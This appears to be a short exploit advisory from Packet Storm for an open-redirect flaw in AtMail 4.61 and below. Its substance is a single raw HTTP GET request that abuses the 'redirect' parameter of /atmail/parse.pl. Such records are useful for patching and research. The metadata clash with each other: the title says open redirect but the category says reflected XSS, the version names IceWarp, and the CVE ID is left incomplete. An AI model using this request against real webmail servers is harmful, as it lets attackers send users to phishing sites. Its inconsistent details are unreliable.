AtMail 4.61 and below Open-Redirect

March 11, 2020

Exploit Author : Lutfu Mert Ceylan
Date : 11.03.2020
Software Link : https://www.atmail.com/cloud-hosted-webmail/
Vendor Homepage : https://www.atmail.com
Version : IceWarp 4.61 and below
Tested on : Mozilla Firefox 56.0 && Opera 67.0.3575.97
Category : Reflected XSS
CVE ID : CVE-2020-



GET REQUEST :

GET /atmail/parse.pl?redirect=TARGET URL HTTP/1.1
Host: targethost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cookie
Connection: close
Upgrade-Insecure-Requests: 1

Vulnerable File : /atmail/parse.pl
Vulnerable Parameter : redirect

Packet Storm : 156705